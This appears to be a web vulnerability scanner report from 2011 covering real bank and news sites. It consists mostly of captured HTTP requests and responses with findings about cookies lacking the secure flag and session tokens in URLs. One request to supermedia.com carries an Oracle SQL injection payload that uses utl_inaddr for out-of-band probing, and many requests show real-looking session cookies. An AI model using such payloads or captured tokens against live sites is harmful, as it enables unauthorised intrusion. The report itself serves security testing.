GET /virtualMedia/img2861.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 4877 Content-Type: image/gif Last-Modified: Thu, 27 Jan 2011 16:22:00 GMT Accept-Ranges: bytes ETag: "504d5e533ebecb1:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:18 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img482.jpg HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js HTTP/1.1 Host: www.suntrust.com Connection: keep-alive Referer: https://www.suntrust.com/portal/server.pt/community/checking_account_selector'/440 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 18:59:29 GMT Content-Type: application/x-javascript Last-Modified: Tue, 21 Oct 2008 20:11:32 GMT Accept-Ranges: bytes ETag: "8fb1ea35b933c91:228d" Server: Microsoft-IIS/6.0 Host-Name: P13B X-Powered-By: ASP.NET Set-Cookie: BIGipServerwww.suntrust.com-pvic=1000473610.20480.0000; path=/ Vary: Accept-Encoding, User-Agent Content-Length: 3569
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.supermedia.com Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/2/3/hsbcpremier/contact-us-form HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:13 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:13 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000iCqR-0svBcJPMWNx9j9Jai6:14k1jbteq; Path=/ Set-Cookie: CAMToken=zT+vap32WY2QfMIaqlxOBx3iIU4=; Path=/1; Secure S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34157
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:09:09 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/online-services/personal-internet-banking/log-on HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:09 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:09 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000RrQWzP_uaKImrSDJuRHMmav:14k1jbteq; Path=/ Set-Cookie: CAMToken=8yJSFvsmfjijg6MsjugN571fSOU=; Path=/1; Secure Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:09:09 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 27426
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wachovia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Wachovia - Person ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:19:51 GMT Content-type: text/html;charset=UTF-8 Cache-control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-cookie: JSESSIONID=BC8AFB9D09E6CFB6400171C92F8B73FF;Path=/;Secure Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:21:18 GMT Content-type: text/html;charset=UTF-8 Cache-control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/EFS/WAC1 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/insurance/identity HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /locator/atm/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/?dm=DMIWEWAC02 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:21:13 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:13 GMT; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/apply/?dm=DMIWEWAC02 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:21:06 GMT Content-length: 9767 Content-type: text/html; charset=UTF-8 Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:06 GMT; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - Ap ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/buy/?dm=DMIWEWAC02 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:20:48 GMT Content-length: 11844 Content-type: text/html; charset=UTF-8 Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:20:48 GMT; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - Ho ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/locations/?dm=DMIWEWAC02 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:21:15 GMT Content-type: text/html; charset=ISO-8859-1 X-Cnection: close Location: https://www.wfhm.com/locations/index.jsp?dm=DMIWEWAC02 Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:15 GMT; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wfhm.com/locations/ind ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/rates/?dm=DMIWEWAC02 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:21:00 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:00 GMT; path=/ Content-Language: en Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - To ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/refinance/?dm=DMIWEWAC02 HTTP/1.1 Host: www.wellsfargo.com Connection: keep-alive Referer: https://www.wellsfargo.com/wachovia/mortgage/index?dm=DMIWEWAC02 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=EF949CC12A6233AB; wfacookie=B-201102021400581302177828; WFHOME=PER; TCID=0007ae71-98bc-bd52-84ae-888500000049; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/autoloans/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/insurance HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/mortgage/index?dm=DMIWEWAC02 HTTP/1.1 Host: www.wellsfargo.com Connection: keep-alive Referer: https://www.wachovia.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=EF949CC12A6233AB; wfacookie=B-201102021400581302177828; WFHOME=PER; TCID=0007ae71-98bc-bd52-84ae-888500000049
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/wealthmanagement/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wachovia to Wells Fargo Inter ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ichecking_landing.jsp HTTP/1.1 Host: www.zionsbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 15:55:18 GMT Content-type: text/html;charset=ISO-8859-1 Connection: close Set-Cookie: lid=32f0cfc6e213a410d7efcde3f83e508b;path=/;domain=.zionsbank.com; Set-Cookie: plid=6ee7930a72c58f63c025e4f8bc6c26a4;expires=Fri, 03-Feb-2012 15:55:18 GMT;path=/;domain=.zionsbank.com;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: www134.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do HTTP/1.1 Host: www152.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /merchant/mainpagedom/authreg_showMainpage.do HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 14:08:20 GMT Server: IBM_HTTP_Server Cache-Control: no-store Location: https://www209.americanexpress.com/merchant/mainpagedom/jumppage.jsp?TYPE=33554432&REALMOID=06-36577fc6-fad0-100d-9cef-80f7dddcfc95&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=$SM$igR5UgqAztly2benjPhgw8%2bn1VWKCX1bCZfPwEgJ%2fJkIgErkX7L%2bPcd4oYgdRXKQ&TARGET=$SM$https%3a%2f%2fwww209%2eamericanexpress%2ecom%2fmerchant%2fmainpagedom%2fauthreg_showMainpage%2edo Content-Length: 655 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerwww309-443=369887754.47873.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www209.americanexpress.com/merchant/mai ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/home.do HTTP/1.1 Host: www217.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/shopping/index.jsp HTTP/1.1 Host: www217.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1 Host: daffodil.acsevents.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
function _f1296730383991(){return {"d":{"__type":"Microsoft.VirtualEarth.Engines.Core.ImageryMetadata.PublicTypes.BirdsEyeSearchResponse","Scene":{"S":35778879,"O":0,"Q":"03201010322","RI":36815,"L":2 ...[SNIP]...
function _f1296730153542(){return {"d":{"__type":"Microsoft.VirtualEarth.Engines.Core.Geocoding.GeocodingResponse","Results":[{"Name":"19101, PA","Type":132,"BestLocation":{"Precision":1,"Coordinates" ...[SNIP]...
GET /2011/02/03/o-c-in-top-three-for-job-growth/48434/ HTTP/1.1 Host: economy.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:04:44 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie Last-Modified: Thu, 03 Feb 2011 19:01:32 +0000 Cache-Control: max-age=108, must-revalidate X-Pingback: http://economy.ocregister.com/xmlrpc.php Link: <http://economy.ocregister.com/?p=48434>; rel=shortlink Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ HTTP/1.1 Host: fastfood.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:05:09 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie Last-Modified: Thu, 03 Feb 2011 19:01:36 +0000 Cache-Control: max-age=87, must-revalidate X-Pingback: http://fastfood.ocregister.com/xmlrpc.php Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ HTTP/1.1 Host: huntingtonhomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:05:42 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php Link: <http://huntingtonhomes.ocregister.com/?p=127042>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 128370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... </div>
GET /2011/02/03/repod-green-home-is-back-on-the-market/127100/ HTTP/1.1 Host: huntingtonhomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:05:42 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php Link: <http://huntingtonhomes.ocregister.com/?p=127100>; rel=shortlink Last-Modified: Thu, 03 Feb 2011 19:05:43 +0000 Cache-Control: max-age=300, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77867
